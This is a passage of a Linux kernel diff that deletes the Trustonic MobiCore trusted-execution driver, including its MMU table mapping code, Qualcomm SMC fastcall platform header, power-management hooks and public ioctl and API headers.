--					"Pointer too big for non-LPAE: 0x%16lx",
--					phys);
--				ret = -EFAULT;
--				goto end;
--			}
--#endif
--			*pte = phys;
--			*pte |= pte_flags;
--		}
--	}
--
--end:
--	if (ret)
--		free_all_pages(mmu_table);
--
--	free_page(pages_page);
--	return ret;
--}
--
--static inline void unmap_buffer(struct tbase_mmu *mmu_table)
--{
--	int t;
--
--	dev_dbg(g_ctx.mcd, "clear MMU table, virt %p", mmu_table);
--	if (!mmu_table->user)
--		goto end;
--
--	/* Release all locked user space pages */
--	for (t = 0; t < mmu_table->l2_tables_nr; t++) {
--		tbase_pte_t *pte = mmu_table->l2_tables[t].ptes;
--		int i;
--
--		for (i = 0; i < L2_ENTRIES_MAX; i++, pte++) {
--			struct page *page;
--
--			/* If not all entries are used, unused ones are 0 */
--			if (!*pte)
--				break;
--
--			/* pte_page() cannot return NULL */
--			page = pte_page(*pte);
--			dev_dbg(g_ctx.mcd, "MMU entry %d: 0x%llx, virt %p",
--				i, (u64)*pte, page);
--
--			page_cache_release(page);
--		}
--	}
--
--end:
--	free_all_pages(mmu_table);
--}
--
--/*
-- * Delete a MMU table.
-- */
--void tbase_mmu_delete(struct tbase_mmu *mmu)
--{
--	if (WARN(!mmu, "NULL mmu pointer given"))
--		return;
--
--	unmap_buffer(mmu);
--	MCDRV_DBG("freed mmu %p: %s len %u off %u table %lx type L%d",
--		  mmu, mmu->user ? "user" : "kernel", mmu->length, mmu->offset,
--		  (uintptr_t)(mmu->l1_table.page ? mmu->l1_l2_table.ptes :
--						   mmu->l2_tables[0].ptes),
--		  mmu->l1_table.page ? 1 : 2);
--	kfree(mmu);
--}
--
--/*
-- * Allocate MMU table and map buffer into it.
-- * That is, create respective table entries.
-- */
--struct tbase_mmu *tbase_mmu_create(struct task_struct *task,
--				   const void *addr,
--				   unsigned int length)
--{
--	struct tbase_mmu *mmu;
--	int ret;
--
--	/* Check input arguments */
--	if (WARN(!addr, "data address is NULL"))
--		return ERR_PTR(-EINVAL);
--
--	if (WARN(!length, "data length is 0"))
--		return ERR_PTR(-EINVAL);
--
--	/* Allocate the struct */
--	mmu = kmalloc(sizeof(*mmu), GFP_KERNEL | __GFP_ZERO);
--	if (!mmu)
--		return ERR_PTR(-ENOMEM);
--
--	/* Create the MMU mapping for the data */
--	ret = map_buffer(task, addr, length, mmu);
--	if (ret) {
--		kfree(mmu);
--		return ERR_PTR(ret);
--	}
--
--	MCDRV_DBG("created mmu %p: %s addr %p len %u off %u table %lx type L%d",
--		  mmu, mmu->user ? "user" : "kernel", addr, mmu->length,
--		  mmu->offset,
--		  (uintptr_t)(mmu->l1_table.page ? mmu->l1_l2_table.ptes :
--						   mmu->l2_tables[0].ptes),
--		  mmu->l1_table.page ? 1 : 2);
--	return mmu;
--}
--
--void tbase_mmu_buffer(const struct tbase_mmu *mmu, struct mcp_buffer_map *map)
--{
--	if (mmu->l1_table.page) {
--		map->phys_addr = virt_to_phys(mmu->l1_l2_table.ptes);
--		map->type = WSM_L1;
--	} else {
--		map->phys_addr = virt_to_phys(mmu->l2_tables[0].ptes);
--		map->type = WSM_L2;
--	}
--
--	map->secure_va = 0;
--	map->offset = mmu->offset;
--	map->length = mmu->length;
--}
--
--int tbase_mmu_info(const struct tbase_mmu *mmu, struct kasnprintf_buf *buf)
--{
--	return kasnprintf(buf,
--			  "\t\t\tmmu %p: %s len %u off %u table %lx type L%d\n",
--			  mmu, mmu->user ? "user" : "kernel", mmu->length,
--			  mmu->offset,
--			  (uintptr_t)(mmu->l1_table.page ?
--				mmu->l1_l2_table.ptes : mmu->l2_tables[0].ptes),
--			  mmu->l1_table.page ? 1 : 2);
--}
-diff --git a/drivers/gud/MobiCoreDriver/mmu.h b/drivers/gud/MobiCoreDriver/mmu.h
-deleted file mode 100644
-index 09efea480bef8..0000000000000
---- a/drivers/gud/MobiCoreDriver/mmu.h
-+++ /dev/null
-@@ -1,44 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _TBASE_MEM_H_
--#define _TBASE_MEM_H_
--
--struct tbase_mmu;
--struct mcp_buffer_map;
--
--/*
-- * Allocate MMU table and map buffer into it.
-- * That is, create respective table entries.
-- */
--struct tbase_mmu *tbase_mmu_create(struct task_struct *task,
--				   const void *wsm_buffer,
--				   unsigned int wsm_len);
--
--/*
-- * Delete a used MMU table.
-- */
--void tbase_mmu_delete(struct tbase_mmu *mmu);
--
--/*
-- * Fill in buffer info for MMU table.
-- */
--void tbase_mmu_buffer(const struct tbase_mmu *mmu, struct mcp_buffer_map *map);
--
--/*
-- * Add info to debug buffer.
-- */
--int tbase_mmu_info(const struct tbase_mmu *mmu, struct kasnprintf_buf *buf);
--
--#endif /* _TBASE_MEM_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/platform.h b/drivers/gud/MobiCoreDriver/platform.h
-deleted file mode 100644
-index f9c801450f64e..0000000000000
---- a/drivers/gud/MobiCoreDriver/platform.h
-+++ /dev/null
-@@ -1,150 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MC_PLATFORM_H_
--#define _MC_PLATFORM_H_
--
--/* MobiCore Interrupt for Qualcomm (DT IRQ has priority if present) */
--#define MC_INTR_SSIQ						280
--
--/* Use SMC for fastcalls */
--#define MC_SMC_FASTCALL
--
--#include <linux/types.h>
--
--/*--------------- Implementation -------------- */
--#if defined(CONFIG_ARCH_APQ8084) || defined(CONFIG_ARCH_MSM8916) || \
--	defined(CONFIG_ARCH_MSM8994) || defined(CONFIG_ARCH_MSM8909) || \
--	defined(CONFIG_ARCH_MSM8996)
--
--#include <soc/qcom/scm.h>
--
--#if defined(CONFIG_ARM64) || defined(CONFIG_ARCH_MSM8916)
--
--	#include <soc/qcom/qseecomi.h>
--	#include <linux/slab.h>
--	#include <linux/io.h>
--	#include <linux/mm.h>
--	#include <asm/cacheflush.h>
--	#include <linux/errno.h>
--
--	#define SCM_MOBIOS_FNID(s, c) (((((s) & 0xFF) << 8) | ((c) & 0xFF)) \
--		| 0x33000000)
--
--	#define TZ_EXECUTIVE_EXT_ID_PARAM_ID \
--		TZ_SYSCALL_CREATE_PARAM_ID_4( \
--			TZ_SYSCALL_PARAM_TYPE_BUF_RW, \
--			TZ_SYSCALL_PARAM_TYPE_VAL, \
--			TZ_SYSCALL_PARAM_TYPE_BUF_RW, \
--			TZ_SYSCALL_PARAM_TYPE_VAL)
--
--#endif
--
--#else
--#include <mach/scm.h>
--#endif
--
--/* from following file */
--#define SCM_SVC_MOBICORE		250
--#define SCM_CMD_MOBICORE		1
--
--static inline int smc_fastcall(void *fc_generic, size_t size)
--{
--#if defined(CONFIG_ARCH_APQ8084) || defined(CONFIG_ARCH_MSM8916) || \
--	defined(CONFIG_ARCH_MSM8994) || defined(CONFIG_ARCH_MSM8996)
--	if (is_scm_armv8()) {
--		struct scm_desc desc = {0};
--		int ret;
--		void *scm_buf = NULL;
--
--		scm_buf = kzalloc(PAGE_ALIGN(size), GFP_KERNEL);
--		if (!scm_buf)
--			return -ENOMEM;
--		memcpy(scm_buf, fc_generic, size);
--		dmac_flush_range(scm_buf, scm_buf + size);
--
--		desc.arginfo = TZ_EXECUTIVE_EXT_ID_PARAM_ID;
--		desc.args[0] = virt_to_phys(scm_buf);
--		desc.args[1] = (u32)size;
--		desc.args[2] = virt_to_phys(scm_buf);
--		desc.args[3] = (u32)size;
--
--		ret = scm_call2(
--			SCM_MOBIOS_FNID(SCM_SVC_MOBICORE, SCM_CMD_MOBICORE),
--				&desc);
--
--		dmac_flush_range(scm_buf, scm_buf + size);
--
--		memcpy(fc_generic, scm_buf, size);
--		kfree(scm_buf);
--		return ret;
--	}
--#endif
--
--	return scm_call(SCM_SVC_MOBICORE, SCM_CMD_MOBICORE,
--			fc_generic, size,
--			fc_generic, size);
--}
--
--/* Fastcall value should be the one for armv7, even if on armv8,
-- * as long as the __aarch32__ flag is not activated in SW.
-- * But for 8996, architecture is armv8 with __aarch32__ in Sw.
-- */
--#if !defined(CONFIG_ARCH_MSM8996)
--#define MC_ARMV7_FC
--#endif
--
--#if defined(CONFIG_ARCH_MSM8996)
--#define CONFIG_TRUSTONIC_TEE_LPAE
--#endif
--
--/*
-- * Perform crypto clock enable/disable
-- * of clocks
-- *     "bus_clk"
-- *     "core_clk"
-- *     "iface_clk"
-- */
--#if (!defined(CONFIG_ARCH_MSM8960) && !defined(CONFIG_ARCH_MSM8994)) || \
--		defined(CONFIG_ARCH_MSM8996)
--#define MC_CRYPTO_CLOCK_MANAGEMENT
--#endif
--
--/*
-- * Perform clock enable/disable for clock  "core_clk_src"
-- */
--#if defined(CONFIG_ARCH_MSM8916) || defined(CONFIG_ARCH_MSM8909) || \
--	defined(CONFIG_ARCH_MSM8996)
--#define MC_DEVICE_PROPNAME "qcom,mcd"
--#if defined(MC_CRYPTO_CLOCK_MANAGEMENT)
--#define MC_CLOCK_CORESRC_PROPNAME "qcom,ce-opp-freq"
--#define MC_CLOCK_CORESRC_DEFAULTRATE 100000000
--#endif /* MC_CRYPTO_CLOCK_MANAGEMENT */
--#endif
--
--
--#if !defined(CONFIG_ARCH_MSM8996)
--/* uid/gid behave like old kernels but with new types */
--/* This flag does not exist on 8996 3.10 kernel version */
--#if !defined(CONFIG_UIDGID_STRICT_TYPE_CHECKS)
--#define MC_UIDGID_OLDSTYLE
--#endif
--/* Fastcall value should be the one for armv7, even if on armv8,
-- * as long as the __aarch32__ flag is not activated in SW.
-- * But for 8996, architecture is armv8 with __aarch32__ in Sw.
-- */
--#define MC_ARMV7_FC
--#endif /* not CONFIG_ARCH_MSM8996 */
--
--#endif /* _MC_PLATFORM_H_ */
--
-diff --git a/drivers/gud/MobiCoreDriver/pm.c b/drivers/gud/MobiCoreDriver/pm.c
-deleted file mode 100644
-index 98310f73dfeab..0000000000000
---- a/drivers/gud/MobiCoreDriver/pm.c
-+++ /dev/null
-@@ -1,62 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#include <linux/module.h>
--#include <linux/device.h>
--#include <linux/suspend.h>
--#include <linux/err.h>
--
--#include "public/mc_linux.h"
--
--#include "platform.h"	/* MC_PM_RUNTIME */
--#include "debug.h"
--#include "scheduler.h"	/* SWd suspend/resume commands */
--#include "pm.h"
--
--#ifdef MC_PM_RUNTIME
--static struct pm_context {
--	struct notifier_block pm_notifier;
--} pm_ctx;
--
--static int mc_suspend_notifier(struct notifier_block *nb, unsigned long event,
--			       void *dummy)
--{
--	switch (event) {
--	case PM_SUSPEND_PREPARE:
--		return mc_scheduler_suspend();
--	case PM_POST_SUSPEND:
--		return mc_scheduler_resume();
--	}
--
--	return 0;
--}
--
--
--/* CPI todo: inconsistent handling of ret in below 2 functions */
--int mc_pm_start(void)
--{
--	int ret = 0;
--
--	pm_ctx.pm_notifier.notifier_call = mc_suspend_notifier;
--	ret = register_pm_notifier(&pm_ctx.pm_notifier);
--	MCDRV_DBG_VERBOSE("done, ret = %d", ret);
--
--	return ret;
--}
--
--void mc_pm_stop(void)
--{
--	unregister_pm_notifier(&pm_ctx.pm_notifier);
--}
--
--#endif /* MC_PM_RUNTIME */
-diff --git a/drivers/gud/MobiCoreDriver/pm.h b/drivers/gud/MobiCoreDriver/pm.h
-deleted file mode 100644
-index 999599a70b1ab..0000000000000
---- a/drivers/gud/MobiCoreDriver/pm.h
-+++ /dev/null
-@@ -1,36 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MC_PM_H_
--#define _MC_PM_H_
--
--#include "platform.h"	/* MC_PM_RUNTIME */
--
--#ifdef MC_PM_RUNTIME
--/* Initialize Power Management */
--int mc_pm_start(void);
--/* Free all Power Management resources*/
--void mc_pm_stop(void);
--#else
--static inline int mc_pm_start(void)
--{
--	return 0;
--}
--
--static inline void mc_pm_stop(void)
--{
--}
--#endif
--
--#endif /* _MC_PM_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/public/mc_admin.h b/drivers/gud/MobiCoreDriver/public/mc_admin.h
-deleted file mode 100644
-index 3a4078dd6fc30..0000000000000
---- a/drivers/gud/MobiCoreDriver/public/mc_admin.h
-+++ /dev/null
-@@ -1,80 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef __MC_ADMIN_IOCTL_H__
--#define __MC_ADMIN_IOCTL_H__
--
--#ifdef __cplusplus
--extern "C" {
--#endif
--
--#define MC_ADMIN_DEVNODE "mobicore"
--
--/* Driver/daemon commands */
--enum {
--	/* Command 0 is reserved */
--	MC_DRV_GET_ROOT_CONTAINER = 1,
--	MC_DRV_GET_SP_CONTAINER = 2,
--	MC_DRV_GET_TRUSTLET_CONTAINER = 3,
--	MC_DRV_GET_TRUSTLET = 4,
--	MC_DRV_SIGNAL_CRASH = 5,
--};
--
--/* MobiCore IOCTL magic number */
--#define MC_IOC_MAGIC    'M'
--
--struct mc_admin_request {
--	uint32_t	request_id;	/* Unique request identifier */
--	uint32_t	command;	/* Command to daemon */
--	struct mc_uuid_t uuid;		/* UUID of trustlet, if relevant */
--	uint32_t	is_gp;		/* Whether trustlet is GP */
--	uint32_t	spid;		/* SPID of trustlet, if relevant */
--};
--
--struct mc_admin_response {
--	uint32_t	request_id;	/* Unique request identifier */
--	uint32_t	error_no;	/* Errno from daemon */
--	uint32_t	spid;		/* SPID of trustlet, if relevant */
--	uint32_t	service_type;	/* Type of trustlet being returned */
--	uint32_t	length;		/* Length of data to get */
--	/* Any data follows */
--};
--
--struct mc_admin_driver_info {
--	/* Version, and something else..*/
--	uint32_t	drv_version;
--	uint32_t	initial_cmd_id;
--};
--
--struct mc_admin_load_info {
--	uint32_t	spid;		/* SPID of trustlet, if relevant */
--	uint64_t	address;	/* Address of the data */
--	uint32_t	length;		/* Length of data to get */
--};
--
--#define MC_ADMIN_IO_GET_DRIVER_REQUEST \
--	_IOR(MC_IOC_MAGIC, 0, struct mc_admin_request)
--#define MC_ADMIN_IO_GET_INFO  \
--	_IOR(MC_IOC_MAGIC, 1, struct mc_admin_driver_info)
--#define MC_ADMIN_IO_LOAD_DRIVER \
--	_IOW(MC_IOC_MAGIC, 2, struct mc_admin_load_info)
--#define MC_ADMIN_IO_LOAD_TOKEN \
--	_IOW(MC_IOC_MAGIC, 3, struct mc_admin_load_info)
--#define MC_ADMIN_IO_LOAD_CHECK \
--	_IOW(MC_IOC_MAGIC, 4, struct mc_admin_load_info)
--
--#ifdef __cplusplus
--}
--#endif
--#endif				/* __MC_ADMIN_IOCTL_H__ */
-diff --git a/drivers/gud/MobiCoreDriver/public/mc_linux.h b/drivers/gud/MobiCoreDriver/public/mc_linux.h
-deleted file mode 100644
-index 2368653f8890d..0000000000000
---- a/drivers/gud/MobiCoreDriver/public/mc_linux.h
-+++ /dev/null
-@@ -1,170 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MC_LINUX_H_
--#define _MC_LINUX_H_
--
--#define MCDRVMODULEAPI_VERSION_MAJOR 2
--#define MCDRVMODULEAPI_VERSION_MINOR 1
--
--#ifndef __KERNEL__
--#include <stdint.h>
--#endif
--
--#define MC_USER_DEVNODE		"mobicore-user"
--
--/** Maximum length of MobiCore product ID string. */
--#define MC_PRODUCT_ID_LEN	64
--
--/** Number of buffers that can be mapped at once */
--#define MC_MAP_MAX		4
--
--/*
-- * Universally Unique Identifier (UUID) according to ISO/IEC 11578.
-- */
--struct mc_uuid_t {
--	uint8_t		value[16];	/* Value of the UUID. */
--};
--
--/*
-- * GP TA login types.
-- */
--enum mc_login_type {
--	TEEC_LOGIN_PUBLIC = 0,
--	TEEC_LOGIN_USER,
--	TEEC_LOGIN_GROUP,
--	TEEC_LOGIN_APPLICATION = 4,
--	TEEC_LOGIN_USER_APPLICATION,
--	TEEC_LOGIN_GROUP_APPLICATION,
--};
--
--/*
-- * GP TA identity structure.
-- */
--struct mc_identity {
--	enum mc_login_type	login_type;
--	union {
--		uint8_t		login_data[16];
--		gid_t		gid;		/* Requested group id */
--		struct {
--			uid_t	euid;
--			uid_t	ruid;
--		} uid;
--	};
--};
--
--/*
-- * Data exchange structure of the MC_IO_OPEN_SESSION ioctl command.
-- */
--struct mc_ioctl_open_sess {
--	struct mc_uuid_t uuid;		/* trustlet uuid */
--	uint32_t	is_gp_uuid;	/* uuid is for GP TA */
--	uint32_t        sid;            /* session id (out) */
--	uint64_t	tci;		/* tci buffer pointer */
--	uint32_t	tcilen;		/* tci length */
--	struct mc_identity identity;	/* GP TA identity */
--};
--
--/*
-- * Data exchange structure of the MC_IO_OPEN_TRUSTLET ioctl command.
-- */
--struct mc_ioctl_open_trustlet {
--	uint32_t	sid;		/* session id (out) */
--	uint32_t	spid;		/* trustlet spid */
--	uint64_t	buffer;		/* trustlet binary pointer */
--	uint32_t	tlen;		/* binary length  */
--	uint64_t	tci;		/* tci buffer pointer */
--	uint32_t	tcilen;		/* tci length */
--};
--
--/*
-- * Data exchange structure of the MC_IO_WAIT ioctl command.
-- */
--struct mc_ioctl_wait {
--	uint32_t	sid;		/* session id (in) */
--	int32_t		timeout;	/* notification timeout */
--};
--
--/*
-- * Data exchange structure of the MC_IO_ALLOC ioctl command.
-- */
--struct mc_ioctl_alloc {
--	uint32_t	len;		/* buffer length  */
--	uint32_t	handle;		/* user handle for the buffer (out) */
--};
--
--/*
-- * Buffer mapping incoming and outgoing information.
-- */
--struct mc_ioctl_buffer {
--	uint64_t	va;		/* user space address of buffer */
--	uint32_t	len;		/* buffer length  */
--	uint64_t	sva;		/* SWd virt address of buffer (out) */
--};
--
--/*
-- * Data exchange structure of the MC_IO_MAP and MC_IO_UNMAP ioctl commands.
-- */
--struct mc_ioctl_map {
--	uint32_t		sid;	/* session id */
--	struct mc_ioctl_buffer	bufs[MC_MAP_MAX];/* buffers info */
--};
--
--/*
-- * Data exchange structure of the MC_IO_ERR ioctl command.
-- */
--struct mc_ioctl_geterr {
--	uint32_t	sid;		/* session id */
--	int32_t		value;		/* error value (out) */
--};
--
--/*
-- * Global MobiCore Version Information.
-- */
--struct mc_version_info {
--	char product_id[MC_PRODUCT_ID_LEN];	/** Product ID string */
--	uint32_t version_mci;		/** Mobicore Control Interface */
--	uint32_t version_so;		/** Secure Objects */
--	uint32_t version_mclf;		/** MobiCore Load Format */
--	uint32_t version_container;	/** MobiCore Container Format */
--	uint32_t version_mc_config;	/** MobiCore Config. Block Format */
--	uint32_t version_tl_api;	/** MobiCore Trustlet API */
--	uint32_t version_dr_api;	/** MobiCore Driver API */
--	uint32_t version_cmp;		/** Content Management Protocol */
--};
--
--/*
-- * defines for the ioctl mobicore driver module function call from user space.
-- */
--/* MobiCore IOCTL magic number */
--#define MC_IOC_MAGIC	'M'
--
--/*
-- * Implement corresponding functions from user api
-- */
--#define MC_IO_OPEN_SESSION	\
--	_IOWR(MC_IOC_MAGIC, 0, struct mc_ioctl_open_sess)
--#define MC_IO_OPEN_TRUSTLET	\
--	_IOWR(MC_IOC_MAGIC, 1, struct mc_ioctl_open_trustlet)
--#define MC_IO_CLOSE_SESSION	_IO(MC_IOC_MAGIC, 2)
--#define MC_IO_NOTIFY		_IO(MC_IOC_MAGIC, 3)
--#define MC_IO_WAIT		_IOW(MC_IOC_MAGIC, 4, struct mc_ioctl_wait)
--#define MC_IO_MAP		_IOWR(MC_IOC_MAGIC, 5, struct mc_ioctl_map)
--#define MC_IO_UNMAP		_IOW(MC_IOC_MAGIC, 6, struct mc_ioctl_map)
--#define MC_IO_ERR		_IOWR(MC_IOC_MAGIC, 7, struct mc_ioctl_geterr)
--#define MC_IO_FREEZE		_IO(MC_IOC_MAGIC, 8)
--#define MC_IO_VERSION		_IOR(MC_IOC_MAGIC, 9, struct mc_version_info)
--#define MC_IO_DR_VERSION	_IOR(MC_IOC_MAGIC, 10, uint32_t)
--
--#endif /* _MC_LINUX_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/public/mc_linux_api.h b/drivers/gud/MobiCoreDriver/public/mc_linux_api.h
-deleted file mode 100644
-index 211bc2682b754..0000000000000
---- a/drivers/gud/MobiCoreDriver/public/mc_linux_api.h
-+++ /dev/null
-@@ -1,28 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MC_LINUX_API_H_
--#define _MC_LINUX_API_H_
--
--/*
-- * Switch tbase active core to core_num, defined as linux
-- * core id
-- */
--int mc_switch_core(uint32_t core_num);
--
--/*
-- * Return tbase active core as Linux core id
-- */
--uint32_t mc_active_core(void);
--
--#endif /* _MC_LINUX_API_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/public/mobicore_driver_api.h b/drivers/gud/MobiCoreDriver/public/mobicore_driver_api.h
-deleted file mode 100644
-index 005099532d73a..0000000000000
---- a/drivers/gud/MobiCoreDriver/public/mobicore_driver_api.h
-+++ /dev/null
-@@ -1,450 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MOBICORE_DRIVER_API_H_
--#define _MOBICORE_DRIVER_API_H_
--
--#include "mc_linux.h"
--
--#define __MC_CLIENT_LIB_API
--
--/*
-- * Return values of MobiCore driver functions.
-- */
--enum mc_result {
--	/* Function call succeeded. */
--	MC_DRV_OK				= 0,
--	/* No notification available. */
--	MC_DRV_NO_NOTIFICATION			= 1,
--	/* Error during notification on communication level. */
--	MC_DRV_ERR_NOTIFICATION			= 2,
--	/* Function not implemented. */
--	MC_DRV_ERR_NOT_IMPLEMENTED		= 3,
--	/* No more resources available. */
--	MC_DRV_ERR_OUT_OF_RESOURCES		= 4,
--	/* Driver initialization failed. */
--	MC_DRV_ERR_INIT				= 5,
--	/* Unknown error. */
--	MC_DRV_ERR_UNKNOWN			= 6,
--	/* The specified device is unknown. */
--	MC_DRV_ERR_UNKNOWN_DEVICE		= 7,
--	/* The specified session is unknown.*/
--	MC_DRV_ERR_UNKNOWN_SESSION		= 8,
--	/* The specified operation is not allowed. */
--	MC_DRV_ERR_INVALID_OPERATION		= 9,
--	/* The response header from the MC is invalid. */
--	MC_DRV_ERR_INVALID_RESPONSE		= 10,
--	/* Function call timed out. */
--	MC_DRV_ERR_TIMEOUT			= 11,
--	/* Can not allocate additional memory. */
--	MC_DRV_ERR_NO_FREE_MEMORY		= 12,
--	/* Free memory failed. */
--	MC_DRV_ERR_FREE_MEMORY_FAILED		= 13,
--	/* Still some open sessions pending. */
--	MC_DRV_ERR_SESSION_PENDING		= 14,
--	/* MC daemon not reachable */
--	MC_DRV_ERR_DAEMON_UNREACHABLE		= 15,
--	/* The device file of the kernel module could not be opened. */
--	MC_DRV_ERR_INVALID_DEVICE_FILE		= 16,
--	/* Invalid parameter. */
--	MC_DRV_ERR_INVALID_PARAMETER		= 17,
--	/* Unspecified error from Kernel Module*/
--	MC_DRV_ERR_KERNEL_MODULE		= 18,
--	/* Error during mapping of additional bulk memory to session. */
--	MC_DRV_ERR_BULK_MAPPING			= 19,
--	/* Error during unmapping of additional bulk memory to session. */
--	MC_DRV_ERR_BULK_UNMAPPING		= 20,
--	/* Notification received, exit code available. */
--	MC_DRV_INFO_NOTIFICATION		= 21,
--	/* Set up of NWd connection failed. */
--	MC_DRV_ERR_NQ_FAILED			= 22,
--	/* Wrong daemon version. */
--	MC_DRV_ERR_DAEMON_VERSION		= 23,
--	/* Wrong container version. */
--	MC_DRV_ERR_CONTAINER_VERSION		= 24,
--	/* System Trustlet public key is wrong. */
--	MC_DRV_ERR_WRONG_PUBLIC_KEY		= 25,
--	/* Wrong container type(s). */
--	MC_DRV_ERR_CONTAINER_TYPE_MISMATCH	= 26,
--	/* Container is locked (or not activated). */
--	MC_DRV_ERR_CONTAINER_LOCKED		= 27,
--	/* SPID is not registered with root container. */
--	MC_DRV_ERR_SP_NO_CHILD			= 28,
--	/* UUID is not registered with sp container. */
--	MC_DRV_ERR_TL_NO_CHILD			= 29,
--	/* Unwrapping of root container failed. */
--	MC_DRV_ERR_UNWRAP_ROOT_FAILED		= 30,
--	/* Unwrapping of service provider container failed. */
--	MC_DRV_ERR_UNWRAP_SP_FAILED		= 31,
--	/* Unwrapping of Trustlet container failed. */
--	MC_DRV_ERR_UNWRAP_TRUSTLET_FAILED	= 32,
--	/* No device associated with connection. */
--	MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN	= 33,
--	/* TA blob attestation is incorrect. */
--	MC_DRV_ERR_TA_ATTESTATION_ERROR		= 34,
--	/* Interrupted system call. */
--	MC_DRV_ERR_INTERRUPTED_BY_SIGNAL	= 35,
--	/* Service is blocked and opensession is thus not allowed. */
--	MC_DRV_ERR_SERVICE_BLOCKED		= 36,
--	/* Service is locked and opensession is thus not allowed. */
--	MC_DRV_ERR_SERVICE_LOCKED		= 37,
--	/* Service was killed by the TEE (due to an administrative command). */
--	MC_DRV_ERR_SERVICE_KILLED		= 38,
--	/* All permitted instances to the service are used */
--	MC_DRV_ERR_NO_FREE_INSTANCES		= 39,
--	/* TA blob header is incorrect. */
--	MC_DRV_ERR_TA_HEADER_ERROR		= 40,
--};
--
--/*
-- * Structure of Session Handle, includes the Session ID and the Device ID the
-- * Session belongs to.
-- * The session handle will be used for session-based MobiCore communication.
-- * It will be passed to calls which address a communication end point in the
-- * MobiCore environment.
-- */
--struct mc_session_handle {
--	uint32_t session_id;		/* MobiCore session ID */
--	uint32_t device_id;		/* Device ID the session belongs to */
--};
--
--/*
-- * Information structure about additional mapped Bulk buffer between the
-- * Trustlet Connector (NWd) and the Trustlet (SWd). This structure is
-- * initialized from a Trustlet Connector by calling mc_map().
-- * In order to use the memory within a Trustlet the Trustlet Connector has to
-- * inform the Trustlet with the content of this structure via the TCI.
-- */
--struct mc_bulk_map {
--	/* The virtual address of the Bulk buffer regarding the address space
--	 * of the Trustlet, already includes a possible offset! */
--	uint32_t secure_virt_addr;
--	uint32_t secure_virt_len;	/* Length of the mapped Bulk buffer */
--};
--
--/* The default device ID */
--#define MC_DEVICE_ID_DEFAULT	0
--/* Wait infinite for a response of the MC. */
--#define MC_INFINITE_TIMEOUT	((int32_t)(-1))
--/* Do not wait for a response of the MC. */
--#define MC_NO_TIMEOUT		0
--/* TCI/DCI must not exceed 1MiB */
--#define MC_MAX_TCI_LEN		0x100000
--
--/**
-- * mc_open_device() - Open a new connection to a MobiCore device.
-- * @device_id:		Identifier for the MobiCore device to be used.
-- *			MC_DEVICE_ID_DEFAULT refers to the default device.
-- *
-- * Initializes all device specific resources required to communicate with a
-- * MobiCore instance located on the specified device in the system. If the
-- * device does not exist the function will return MC_DRV_ERR_UNKNOWN_DEVICE.
-- *
